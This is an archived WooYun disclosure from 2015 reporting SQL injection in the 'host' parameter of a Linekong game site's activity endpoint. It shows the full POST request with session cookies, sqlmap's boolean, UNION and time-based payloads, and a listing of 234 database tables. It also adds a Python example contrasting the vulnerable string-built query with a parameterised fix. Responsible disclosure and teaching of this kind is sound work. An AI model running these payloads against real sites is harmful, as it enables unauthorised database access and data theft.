WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-05-22: Details sent to the vendor; awaiting vendor handling
2015-05-25: Vendor has confirmed; details disclosed to the vendor only
2015-06-04: Details disclosed to core white hats and experts in the relevant field
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public
Linekong Technology "Journey to the West" SQL injection, round four
Continuing to help you find vulnerabilities... I had actually already submitted a fourth one, but unexpectedly it wasn't accepted... so I went and found another one; I don't think anyone has found this injection yet... Here is the test request directly:
POST /activity/superMM/_do_selectplayer.ajax.php HTTP/1.1
Host: xy.linekong.com
Proxy-Connection: keep-alive
Content-Length: 11
Accept: text/html, */*
Origin: http://xy.linekong.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://xy.linekong.com/activity/superMM/note.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=5389347840; PHPSESSID=pcii8pkinj9i8kn5qni54ucrp7; pgv_si=s4919567360; __utmt=1; page_hash=3a88ff73c7ca815ea74c7e7295fa7788; __utma=105338506.1099027272.1432191841.1432191841.1432191841.1; __utmb=105338506.25.10.1432191841; __utmc=105338506; __utmz=105338506.1432191841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

host=601022
The host parameter is injectable...
POST parameter 'host' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: POST
Parameter: host
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: host=601022' AND 3034=3034 AND 'nVzN'='nVzN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: host=601022' UNION ALL SELECT NULL,CONCAT(0x7170716a71,0x646b6e6464447707478,0x7170787871),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: host=601022' AND SLEEP(5) AND 'oNSa'='oNSa
---
[16:04:20] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Then a look at the databases:
[*] information_schema
[*] xy_web
Then the tables:
Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log |
| xy_act_prize_log |
| xy_act_prize_log_20131224 |
| xy_activity_10wan |
| xy_activity_10wan_card |
| xy_activity_10wan_info |
| xy_activity_10wan_info2nd |
| xy_activity_10wan_lottery |
| xy_activity_20100815 |
| xy_activity_20100815_info_log |
| xy_activity_20100815_netpas_code_log |
| xy_activity_20100815_taobao_invite |
| xy_activity_20100815_taobao_sales |
| xy_activity_20100815_taobao_sales_log |
| xy_activity_2011midautumn_ecard |
| xy_activity_2011midautumn_items |
| xy_activity_2011midautumn_userinfo |
| xy_activity_300wan |
| xy_activity_6gift_getlog |
| xy_activity_6gift_log |
| xy_activity_6gift_sign |
| xy_activity_activation_log |
| xy_activity_army_draw_log |
| xy_activity_army_info |
| xy_activity_army_member |
| xy_activity_army_vote_log |
| xy_activity_armycreate_log |
| xy_activity_armygetgift_log |
| xy_activity_back |
| xy_activity_beautyvote_player |
| xy_activity_beautyvote_voter |
| xy_activity_blissfulcard_cdkey |
| xy_activity_blissfulcard_log |
| xy_activity_brother_activate_log |
| xy_activity_brother_code_log |
| xy_activity_bysf_guestbook |
| xy_activity_bysf_log |
| xy_activity_bysf_passport |
| xy_activity_bysf_question |
| xy_activity_chit_code |
| xy_activity_date |
| xy_activity_date_log |
| xy_activity_duowanvip_code |
| xy_activity_duowanvip_log |
| xy_activity_familybattle_army |
| xy_activity_familybattle_army_back |
| xy_activity_familybattle_army_prepare |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief |
| xy_activity_familybattle_armychief_back |
| xy_activity_familybattle_lottery_log |
| xy_activity_fenliulottery_log |
| xy_activity_first_cdkey |
| xy_activity_first_cdkey_state |
| xy_activity_foyuan_cdkey |
| xy_activity_foyuan_log |
| xy_activity_foyuan_message |
| xy_activity_getchit_log |
| xy_activity_gg_cdkey |
| xy_activity_gg_cdkey_state |
| xy_activity_gh_level |
| xy_activity_goldeneyes_cdkey |
| xy_activity_goldeneyes_cdkey_state |
| xy_activity_goldeneyes_dayinfo |
| xy_activity_goldeneyes_doublekey |
| xy_activity_guestbook |
| xy_activity_hopewall |
| xy_activity_hopewall_bless |
| xy_activity_huikui_answer_log |
| xy_activity_huikui_lottery_log |
| xy_activity_jh2_log |
| xy_activity_jh2_member |
| xy_activity_jh2_taobao |
| xy_activity_jh2_taobao_log |
| xy_activity_jh_log |
| xy_activity_jh_member |
| xy_activity_jianding_log |
| xy_activity_jianmianhui |
| xy_activity_jiaozi_log |
| xy_activity_joinarmy_log |
| xy_activity_journey_cdkey |
| xy_activity_journey_cdkey_state |
| xy_activity_journey_dayinfo |
| xy_activity_journey_gc |
| xy_activity_journey_gc_log |
| xy_activity_king_log |
| xy_activity_kingbattle_army |
| xy_activity_kingbattle_army_prepare |
| xy_activity_kingbattle_armychief |
| xy_activity_kingbattle_lottery_log |
| xy_activity_lostself_code_log |
| xy_activity_lostself_exchange_log |
| xy_activity_lostself_transfer_log |
| xy_activity_lover |
| xy_activity_lv20_log |
| xy_activity_lv20_member |
| xy_activity_lv30_log |
| xy_activity_lv30_log1 |
| xy_activity_lv40_card_10 |
| xy_activity_lv40_card_30 |
| xy_activity_lv40_log |
| xy_activity_lv40_member |
| xy_activity_lv60_log1 |
| xy_activity_makewishes |
| xy_activity_makewishes_draw_log |
| xy_activity_meeting |
| xy_activity_name_log |
| xy_activity_namegc_log |
| xy_activity_neg_player |
| xy_activity_neg_voter |
| xy_activity_new_act |
| xy_activity_newact_itemlog |
| xy_activity_newlottery |
| xy_activity_newyear_log |
| xy_activity_nverguo2 |
| xy_activity_nverguo_cdkey |
| xy_activity_nverguo_log |
| xy_activity_old_player |
| xy_activity_oldfriends1_gift_log |
| xy_activity_oldfriends1_verify_inviter |
| xy_activity_oldfriends_exchange_log |
| xy_activity_oldfriends_inviter |
| xy_activity_oldfriends_oldplayer |
| xy_activity_oldfriends_verify_inviter |
| xy_activity_opg_card |
| xy_activity_opg_log |
| xy_activity_opg_turnround_card |
| xy_activity_opg_turnround_log |
| xy_activity_opg_user |
| xy_activity_package_card |
| xy_activity_package_card_log |
| xy_activity_package_gift_log |
| xy_activity_pagoda_log |
| xy_activity_people_vote_check |
| xy_activity_people_vote_log |
| xy_activity_people_vote_man_log |
| xy_activity_privilege_card |
| xy_activity_privilege_log |
| xy_activity_qb |
| xy_activity_qb2nd |
| xy_activity_qb3rd |
| xy_activity_qb4th |
| xy_activity_qb5th |
| xy_activity_qb5th_bak |
| xy_activity_qixi |
| xy_activity_qmxscj_card |
| xy_activity_qmxscj_log |
| xy_activity_qqlz |
| xy_activity_qqlz_cdkey |
| xy_activity_rally_giver |
| xy_activity_rally_invitee |
| xy_activity_renzheng_log |
| xy_activity_rushlevel |
| xy_activity_shenlian_cdkey |
| xy_activity_shenlian_cdkey_log |
| xy_activity_song_log |
| xy_activity_songfinal_userinfo |
| xy_activity_songfinal_voteinfo |
| xy_activity_survey_code |
| xy_activity_survey_log |
| xy_activity_survey_question |
| xy_activity_tequan_card |
| xy_activity_tequan_log |
| xy_activity_vote_log |
| xy_activity_vote_query |
| xy_activity_welfare_cdkey |
| xy_activity_welfare_log |
| xy_activity_welfare_message |
| xy_activity_wudidong_chongji |
| xy_activity_wudidong_jifen |
| xy_activity_xunyou_ge |
| xy_activity_xunyou_ge_cdkey |
| xy_activity_xunyou_log |
| xy_activity_xyl |
| xy_activity_xyvip_gift_log |
| xy_activity_xyvip_log |
| xy_activity_zhailing_cdkey |
| xy_activity_zhailing_log |
| xy_activity_zhanbu |
| xy_activity_zhuanpan |
| xy_activity_zhuanpan_voucher |
| xy_activity_zhuanpan_voucher_log |
| xy_activity_zhufu_bless |
| xy_activity_zhufu_log |
| xy_activity_zhufu_lottery |
| xy_address |
| xy_article |
| xy_article_demo |
| xy_article_inserl |
| xy_build |
| xy_channel |
| xy_columns |
| xy_comment |
| xy_demo |
| xy_download |
| xy_editors_inserl |
| xy_flash |
| xy_grading |
| xy_group |
| xy_image |
| xy_image_inserl |
| xy_jnh_5173card_log |
| xy_jnh_gift |
| xy_jnh_gift_log |
| xy_jnh_luck |
| xy_jnh_luck_log |
| xy_jnh_passport_log |
| xy_jnh_receive_log |
| xy_login_game_history |
| xy_lottery_20100209_state |
| xy_lottery_count |
| xy_lottery_log |
| xy_mall_exchange_log |
| xy_mall_lottery_log |
| xy_member |
| xy_pass_card_list |
| xy_pass_card_list_log |
| xy_passportstat |
| xy_sort |
| xy_special_like_vote |
| xy_special_taici_vote |
| xy_taobao_voucher |
| xy_taobao_voucher_log |
| xy_template |
| xy_types |
| xy_url |
| xy_url_inserl |
| xy_vote |
| xy_vote_inserl |
| xy_vote_option |
| xy_wj_article |
| xy_wj_article_inserl |
| xy_wj_image |
| xy_wj_image_inserl |
+--------------------------------------------+
234 tables... patch it quickly...
As above
You have already sent gifts twice; could you say what the gifts were? O(∩_∩)O
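The report shows why the endpoint is exploitable (sqlmap's boolean-based payload) but not the code pattern behind it or its fix. The following is an added example written for this page, not code from the report or from Linekong's site: a hypothetical reconstruction of a `host` lookup that pastes the POST value into the SQL string, next to the parameterised form that fixes it. It uses an in-memory SQLite database in place of MySQL, so only the boolean-based payload from the sqlmap output is exercised (the UNION payload's `#` comment is MySQL syntax); the table and column names are assumptions and the player rows are constructed.

```python
import sqlite3

# Constructed stand-in for the site's player data; table/column names are
# assumptions, not taken from the real xy_web schema.
SAMPLE_PLAYERS = [
    ("601022", "player_a"),
    ("601023", "player_b"),
]

# The "true" payload is the boolean-based one from the sqlmap output in the
# report; the "false" twin is constructed so the blind oracle becomes visible.
PAYLOAD_TRUE = "601022' AND 3034=3034 AND 'nVzN'='nVzN"
PAYLOAD_FALSE = "601022' AND 3034=3035 AND 'nVzN'='nVzN"


def make_db():
    """Build a fresh in-memory database holding the constructed players."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE player (host TEXT, name TEXT)")
    conn.executemany("INSERT INTO player VALUES (?, ?)", SAMPLE_PLAYERS)
    return conn


def select_player_vulnerable(conn, host):
    """Hypothetical weak pattern: the POST value is interpolated into the SQL
    text, so a quote inside it closes the literal and the rest becomes SQL."""
    sql = f"SELECT name FROM player WHERE host = '{host}'"
    return [row[0] for row in conn.execute(sql)]


def select_player_safe(conn, host):
    """Parameterised form: the value is bound by the driver and is never
    parsed as SQL, so the payload is just a string that matches no row."""
    sql = "SELECT name FROM player WHERE host = ?"
    return [row[0] for row in conn.execute(sql, (host,))]


def boolean_oracle_present(query_fn, conn):
    """True if the lookup answers differently for the true and false payloads,
    which is exactly the bit-by-bit leak a boolean-based blind injection uses."""
    return query_fn(conn, PAYLOAD_TRUE) != query_fn(conn, PAYLOAD_FALSE)


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, normal value :", select_player_vulnerable(conn, "601022"))
    print("vulnerable, true payload :", select_player_vulnerable(conn, PAYLOAD_TRUE))
    print("vulnerable, false payload:", select_player_vulnerable(conn, PAYLOAD_FALSE))
    print("vulnerable oracle present:", boolean_oracle_present(select_player_vulnerable, conn))
    print("safe, true payload       :", select_player_safe(conn, PAYLOAD_TRUE))
    print("safe oracle present      :", boolean_oracle_present(select_player_safe, conn))
```

The interpolated query returns the player row for the true payload and nothing for the false one, which is the behavioural difference sqlmap detected with 41 requests; the bound-parameter query returns nothing for either, because the whole payload is compared as one string. The same change applies to the PHP endpoint in the report: use mysqli or PDO prepared statements for `host` instead of building the query text from the request body.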
Severity level: High
Vulnerability Rank: 11
Confirmation time: 2015-05-25 14:33
Vulnerability confirmed; contacting the developers to handle it
None yet